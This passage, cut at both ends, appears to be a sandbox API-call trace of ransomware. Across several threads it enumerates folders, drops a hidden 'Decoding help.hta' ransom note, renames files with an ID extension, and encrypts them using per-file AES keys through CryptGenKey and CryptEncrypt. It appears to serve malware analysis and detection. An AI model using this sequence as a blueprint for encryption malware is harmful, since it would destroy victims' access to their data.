Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0056.755] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0056.755] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0060.848] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 771 os_tid = 0xa0c [0054.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*", lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a23f070, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5fca4a0 [0058.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.383] FindNextFileW (in: hFindFile=0x5fca4a0, lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a20bca0, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a257f60, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a23f070, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.383] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.383] FindNextFileW (in: hFindFile=0x5fca4a0, lpFindFileData=0xd18fd30 | out: lpFindFileData=0xd18fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9b1b00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7c9b1b00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7c9b1b00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0x554520, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0058.383] lstrcpyW (in: lpString1=0x24550388, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.383] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 125 [0058.384] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" [0058.384] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\decoding help.hta")) returned 0x20 [0058.384] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.384] lstrlenW (lpString="cab1.cab") returned 8 [0058.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*" [0058.384] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\*.*") returned 125 [0058.384] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.384] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" [0058.384] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0058.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.385] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{929FBD26-9020-399B-9A7A-751D61F0B942}v12.0.21005\\packages\\vcRuntimeAdditional_amd64\\cab1.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\all users\\package cache\\{929fbd26-9020-399b-9a7a-751d61f0b942}v12.0.21005\\packages\\vcruntimeadditional_amd64\\cab1.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb94 [0058.385] CreateFileMappingA (hFile=0xb94, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xb98 [0058.385] CryptAcquireContextA (in: phProv=0xd18fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd18fcec*=0x2aac5bc0) returned 1 [0060.208] CryptGenKey (in: hProv=0x2aac5bc0, Algid=0x6610, dwFlags=0x1, phKey=0xd18fce8 | out: phKey=0xd18fce8*=0x5fca4e0) returned 1 [0060.208] CryptExportKey (in: hKey=0x5fca4e0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd18fbe4, pdwDataLen=0xd18fce4 | out: pbData=0xd18fbe4*, pdwDataLen=0xd18fce4*=0x2c) returned 1 [0060.208] MapViewOfFile (hFileMappingObject=0xb98, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0x142e0000 [0065.118] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd18fbe4*, pdwDataLen=0xd18fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd18fbe4*, pdwDataLen=0xd18fcf8*=0x100) returned 1 [0065.119] CryptEncrypt (hKey=0x5fca4e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x142e0000, pdwDataLen=0xd18fce4*=0x100000, dwBufLen=0x100000) Thread: id = 772 os_tid = 0x50c [0054.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0xd7cfd30 | out: lpFindFileData=0xd7cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d88d0 [0055.491] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.491] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0xd7cfd30 | out: lpFindFileData=0xd7cfd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.491] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0055.491] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.491] FindNextFileW (in: hFindFile=0x5d88d0, lpFindFileData=0xd7cfd30 | out: lpFindFileData=0xd7cfd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xecb5bdd0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xecb5bdd0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe952fcd0, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x892c, dwReserved0=0x0, dwReserved1=0x0, cFileName="AdobeCMapFnt10.lst", cAlternateFileName="ADOBEC~1.LST")) returned 1 [0055.491] lstrcpyW (in: lpString1=0x10f573e0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*" [0055.491] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*") returned 70 [0055.491] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Decoding help.hta" [0055.491] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\decoding help.hta")) returned 0xffffffff [0055.492] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbac [0058.389] WriteFile (in: hFile=0xbac, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xd7cfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xd7cfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.390] CloseHandle (hObject=0xbac) returned 1 [0058.390] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.391] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AdobeCMapFnt10.lst") returned 1 [0058.391] lstrlenW (lpString="AdobeCMapFnt10.lst") returned 18 [0058.391] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*" [0058.391] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\*.*") returned 70 [0058.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\", lpString2="AdobeCMapFnt10.lst" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" [0058.391] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" [0058.391] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.[ID]g9uZrLhJaygpwRm1[ID]" [0058.391] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.392] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\10.0\\AdobeCMapFnt10.lst.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\adobe\\acrobat\\10.0\\adobecmapfnt10.lst.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xbac [0058.392] CreateFileMappingA (hFile=0xbac, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xbb0 [0058.392] CryptAcquireContextA (in: phProv=0xd7cfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xd7cfcec*=0x2aac5cd0) returned 1 [0060.209] CryptGenKey (in: hProv=0x2aac5cd0, Algid=0x6610, dwFlags=0x1, phKey=0xd7cfce8 | out: phKey=0xd7cfce8*=0x5fca560) returned 1 [0060.209] CryptExportKey (in: hKey=0x5fca560, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xd7cfbe4, pdwDataLen=0xd7cfce4 | out: pbData=0xd7cfbe4*, pdwDataLen=0xd7cfce4*=0x2c) returned 1 [0060.209] MapViewOfFile (hFileMappingObject=0xbb0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8920) returned 0x39c0000 [0065.149] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xd7cfbe4*, pdwDataLen=0xd7cfcf8*=0x40, dwBufLen=0x100 | out: pbData=0xd7cfbe4*, pdwDataLen=0xd7cfcf8*=0x100) returned 1 [0065.150] CryptEncrypt (hKey=0x5fca560, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x39c0000, pdwDataLen=0xd7cfce4*=0x8920, dwBufLen=0x8920) Thread: id = 773 os_tid = 0xa38 [0054.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*", lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a1f2db0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42cf618 [0058.285] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0058.285] FindNextFileW (in: hFindFile=0x42cf618, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1a1e5b40, ftCreationTime.dwHighDateTime=0x1d2e621, ftLastAccessTime.dwLowDateTime=0x1a1e5b40, ftLastAccessTime.dwHighDateTime=0x1d2e621, ftLastWriteTime.dwLowDateTime=0x2a1f2db0, ftLastWriteTime.dwHighDateTime=0x1d526b8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0058.285] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0058.285] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0058.285] FindNextFileW (in: hFindFile=0x42cf618, lpFindFileData=0xe68fd30 | out: lpFindFileData=0xe68fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b69ee00, ftCreationTime.dwHighDateTime=0x1cf3dd2, ftLastAccessTime.dwLowDateTime=0x7b69ee00, ftLastAccessTime.dwHighDateTime=0x1cf3dd2, ftLastWriteTime.dwLowDateTime=0x7b69ee00, ftLastWriteTime.dwHighDateTime=0x1cf3dd2, nFileSizeHigh=0x0, nFileSizeLow=0xfc90a, dwReserved0=0x0, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0058.285] lstrcpyW (in: lpString1=0x24fe73c8, lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.285] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 122 [0058.285] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" [0058.285] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\Decoding help.hta" (normalized: "c:\\users\\all users\\package cache\\{a749d8e6-b613-3be3-8f5f-045c84eba29b}v12.0.21005\\packages\\vcruntimeminimum_amd64\\decoding help.hta")) returned 0x20 [0058.286] lstrcmpiW (lpString1="Decoding help.hta", lpString2="cab1.cab") returned 1 [0058.286] lstrlenW (lpString="cab1.cab") returned 8 [0058.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*" [0058.286] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\*.*") returned 122 [0058.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\", lpString2="cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0058.286] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab") returned="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab" [0058.286] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Package Cache\\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}v12.0.21005\\packages\\vcRuntimeMinimum_amd64\\cab1.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Package 